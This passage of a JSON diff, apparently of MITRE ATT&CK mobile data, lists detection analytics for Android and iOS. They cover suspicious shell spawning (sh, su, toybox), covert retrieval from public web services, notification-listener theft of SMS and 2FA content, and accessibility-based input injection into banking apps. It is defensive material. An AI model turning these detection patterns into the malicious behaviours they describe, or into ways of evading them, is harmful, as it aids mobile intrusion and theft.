+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Device enrollment or compliance event shows failed or degraded verified boot, hardware-backed attestation mismatch, patch/build/baseband inconsistency, or unexpected device property drift near first contact"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Protected resource use or privileged framework access occurs while device is locked, before normal setup completion, or from an app/service not in foreground and not on approved preload list"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between enrollment/posture anomaly, privileged capability use, and network egress."
+                        },
+                        {
+                            "field": "AllowedOEMComponents",
+                            "description": "Approved system identities, preload packages, and OEM services differ by model and fleet."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "OEM update, activation, MDM, and enterprise service destinations vary by environment."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some protected resource access may be legitimate only when the app is foregrounded."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close resource access must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "EnrollmentGracePeriod",
+                            "description": "Initial setup/update behavior may generate benign network or configuration drift for a short period."
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Size threshold for suspicious outbound transfer from a device in abnormal posture."
+                        },
+                        {
+                            "field": "ApprovedImageBaseline",
+                            "description": "Known-good build fingerprint, patch, boot state, and baseband combinations vary by device fleet."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-16 21:48:51.316000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--53491f5a-7062-41f0-a51d-07b52dc8192c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0604#AN1654",
+                            "external_id": "AN1654"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1654",
+                    "description": "The defender observes a device at activation, supervision, or enrollment time with unusual management-plane posture, inventory, or trust characteristics and then relies primarily on downstream network effects and device state inconsistencies rather than direct low-level process telemetry. On iOS, the most reliable sequence is supervision/attestation or inventory concern near first contact followed by network egress or protected-state behavior that is inconsistent with lock state, setup phase, or expected managed app activity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Supervised enrollment, activation, or inventory event reveals unexpected device property relationships, anomalous managed posture, unexplained configuration drift near first contact, or identity/inventory characteristics inconsistent with approved procurement baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app or device-originated network activity occurs while the device is locked or before expected managed app initialization sequence, inconsistent with expected background refresh baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between enrollment/inventory concern and suspicious network activity."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Most strong posture and inventory analytics require supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedDestinations",
+                            "description": "Apple, MDM, update, enterprise, and managed SaaS destinations vary by organization."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Expected background network behavior varies by managed app set and policy."
+                        },
+                        {
+                            "field": "ActivationGracePeriod",
+                            "description": "Benign activation, restore, and setup traffic can be noisy immediately after provisioning."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how recently the user must have interacted for activity to be considered expected."
+                        },
+                        {
+                            "field": "InventoryDriftTolerance",
+                            "description": "Tuning for acceptable changes in inventory/configuration during upgrades or replacements."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-03-16 22:10:25.735000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f2c74903-6770-4f55-9a11-edcf6e00938e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0607#AN1657",
+                            "external_id": "AN1657"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1657",
+                    "description": "The defender correlates app-driven shell-launch behavior with subsequent execution of Unix shell processes or shell-script activity under the same app context, especially when execution occurs from background state, without recent user interaction, or is followed by file-system, privilege-escalation, or network effects inconsistent with the app's declared role. The analytic prioritizes Android-observable control-plane effects: Runtime or ProcessBuilder invocation, spawn of sh/toybox/toolbox/su or equivalent shell process, script-file staging or redirected output, and post-execution network or local artifact creation.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between shell-launch method use, Unix shell process creation, and follow-on file or network effects"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to run shells, such as approved terminal apps, enterprise support tools, device management agents, or developer tooling"
+                        },
+                        {
+                            "field": "AllowedProcessPatterns",
+                            "description": "Expected shell binaries, parent-child process chains, and helper-process patterns for approved apps"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether Unix shell execution should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "CommandArgumentRiskPatterns",
+                            "description": "Environment-specific list of suspicious shell arguments, pipes, redirection, chaining operators, or privilege-escalation references"
+                        },
+                        {
+                            "field": "SensitivePathPatterns",
+                            "description": "Environment-specific list of high-value file paths or system locations touched after shell execution"
+                        },
+                        {
+                            "field": "PostExecutionWriteThreshold",
+                            "description": "Minimum number or size of artifacts created after shell execution to increase confidence"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after shell execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-09 20:47:35.790000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--649ee05c-9f09-47fc-802a-7df2ce362563",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0607#AN1658",
+                            "external_id": "AN1658"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1658",
+                    "description": "The defender correlates managed-app process-launch or shell-like execution effects with subsequent file or network activity by the same app, then raises confidence when execution occurs in background context, without recent user interaction, or appears tied to command delivery or output exfiltration. Because direct Unix-shell observability is typically weaker on iOS and child processes remain constrained by the app sandbox, the analytic anchors on process-execution effects where available and then on lifecycle, file, and network side effects rather than assuming rich shell-parameter visibility in all environments.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between shell-like execution indication, process effects, and follow-on file or network behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps legitimately expected to perform debugging, remote support, or enterprise automation tasks"
+                        },
+                        {
+                            "field": "AllowedProcessPatterns",
+                            "description": "Expected helper-process or process-launch patterns for approved managed apps"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether shell-like execution should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "ArtifactPathPatterns",
+                            "description": "Expected temporary or output file locations for approved app behavior"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after shell-like execution to treat network behavior as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-09 20:52:16.713000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--ddebe043-2017-44ba-96e5-cbe87916511b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0610#AN1663",
+                            "external_id": "AN1663"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1663",
+                    "description": "The defender correlates repeated or periodic app-attributed retrieval from a legitimate public web-service platform with runtime conditions showing that the retrieval is not aligned to normal foreground consumption, user interaction, or approved app role. The strongest Android evidence is a managed or installed app repeatedly issuing inbound-oriented GET, fetch, sync, or content-pull operations to social, collaboration, paste, code-hosting, cloud-storage, messaging, or generic HTTPS platforms while the app is backgrounded, while the device is locked, or without recent user interaction, and without a corresponding outbound writeback to that same service class during the operational window. The detection is strengthened when the retrieval is temporally adjacent to scheduled/background execution, local state changes, or later downstream effects that do not require the same public platform to receive output.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when repeated retrieval from public web-service domain began and no foreground transition occurred during the retrieval sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing repeated one-way retrieval was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for background content retrieval"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window used to evaluate recurring retrieval and absence of same-service writeback."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved app identities vary by organization, role, and device group."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some apps legitimately retrieve content from collaboration, messaging, storage, or code-hosting services."
+                        },
+                        {
+                            "field": "AllowedReadOnlyMappings",
+                            "description": "Defines which apps are expected to only retrieve, and under what foreground/background conditions."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close retrieval must be to user activity to be considered expected"
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for benign refresh, sync, or polling behavior differs by app category"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some apps should only retrieve from certain public service classes while foregrounded"
+                        },
+                        {
+                            "field": "InboundOutboundRatioThreshold",
+                            "description": "Expected ratio of inbound to outbound bytes for benign app refresh behavior varies by workload."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-19 15:15:16.075000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--dec6e0d3-f4ae-48ed-90b9-ee32fd7e8dc6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0610#AN1664",
+                            "external_id": "AN1664"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1664",
+                    "description": "The defender correlates repeated retrieval-oriented communication from a supervised device or managed iOS app to a legitimate public web-service platform where the activity remains primarily inbound and does not produce corresponding writeback to that same service class during the operational window. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, social, messaging, storage, or generic HTTPS platforms where inbound fetches or content pulls recur during background refresh, while the device is locked, or without recent user interaction, and no matching POST, upload, update, or message-send activity to that same public service class is observed. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during repeated inbound retrieval sequence from public web-service platform"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before repeated retrieval sequence from public web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing repeated one-way retrieval was not present in approved managed-app baseline or was not permitted to use detected public web-service class for background content retrieval"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window used to evaluate recurring retrieval and absence of same-service writeback."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed bundle identities vary by organization and device profile."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some managed apps legitimately retrieve content from storage, collaboration, or messaging services."
+                        },
+                        {
+                            "field": "AllowedReadOnlyMappings",
+                            "description": "Defines which bundles are expected to retrieve without writeback, and in what context."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Expected background retrieval behavior differs across managed app categories."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close retrieval must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for benign refresh, polling, or sync behavior differs by bundle type."
+                        },
+                        {
+                            "field": "InboundOutboundRatioThreshold",
+                            "description": "Expected ratio of inbound to outbound bytes for benign managed-app refresh behavior varies by workflow."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-19 15:26:39.271000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--462f9ed4-5b6b-4426-b383-cd331f2984c0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0611#AN1665",
+                            "external_id": "AN1665"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1665",
+                    "description": "An application is granted or maintains notification listener access, observes notification content from other applications (including sensitive sources such as SMS/email/2FA apps), processes or stores notification payloads, and optionally suppresses or programmatically interacts with notifications (dismiss/action triggers) without corresponding foreground user interaction. Detection correlates special access permission state + notification event interception + application background state + downstream data use (local write or network transmission).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "NotificationListenerService enabled OR notification access granted to app not in enterprise-approved list"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Notification access event occurs while app_state=background AND device_state=locked OR no recent user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between notification interception and subsequent data write or network transmission varies by app behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Enterprise-approved apps with legitimate notification access (e.g., accessibility tools, wearables)"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether notification access is expected only when the app is foregrounded"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Threshold for small outbound payloads indicative of notification content exfiltration"
+                        },
+                        {
+                            "field": "SensitiveSourceApps",
+                            "description": "Apps whose notifications are considered sensitive (SMS, email, authenticator apps)"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-01 14:50:46.895000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--dda0e909-cceb-40eb-bff0-6bd0cd74e638",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0612#AN1666",
+                            "external_id": "AN1666"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1666",
+                    "description": "The defender correlates Android accessibility or UI-automation-capable behavior from an app identity with injected user-interface actions occurring on behalf of the user in another foreground application. The strongest Android evidence is accessibility-enabled or similarly privileged app behavior that triggers programmatic clicks, global actions, or text insertion into another app's active UI, especially when those actions occur without matching user touch interaction, while the injecting app is backgrounded or foreground-service-only, or when the target foreground app belongs to a sensitive category such as banking, payments, identity, communications, or enterprise access. The detection is strengthened when the injected input sequence is followed by target-app navigation, form submission, transaction progression, or network activity from the target context.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Injecting app remained backgrounded or foreground-service-only while injected click, global action, or text insertion occurred in a different foreground app"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before injected UI action and no matching touch interaction was observed for the target foreground app during injection sequence"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Sensitive app category remained foregrounded during injected UI sequence from different app identity"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window linking injected actions to target-app navigation, submission, or downstream network effects."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved accessibility, autofill, remote-assist, or QA/testing apps vary by organization and device group."
+                        },
+                        {
+                            "field": "AllowedAccessibilityApps",
+                            "description": "Approved accessibility-enabled apps vary by assistive and enterprise workflow."
+                        },
+                        {
+                            "field": "AllowedAutofillApps",
+                            "description": "Approved password managers or autofill-capable apps may legitimately inject text into fields."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close an injected action must be to user interaction to be considered expected."
+                        },
+                        {
+                            "field": "SensitiveForegroundAppCategories",
+                            "description": "Categories such as banking, payments, identity, communications, and enterprise access may warrant higher sensitivity."
+                        },
+                        {
+                            "field": "GlobalActionBurstThreshold",
+                            "description": "Threshold for repeated programmatic global actions within a short window."
+                        },
+                        {
+                            "field": "TextInjectionLengthThreshold",
+                            "description": "Minimum inserted text length or field-population pattern considered suspicious outside approved autofill workflows."
+                        },
+                        {
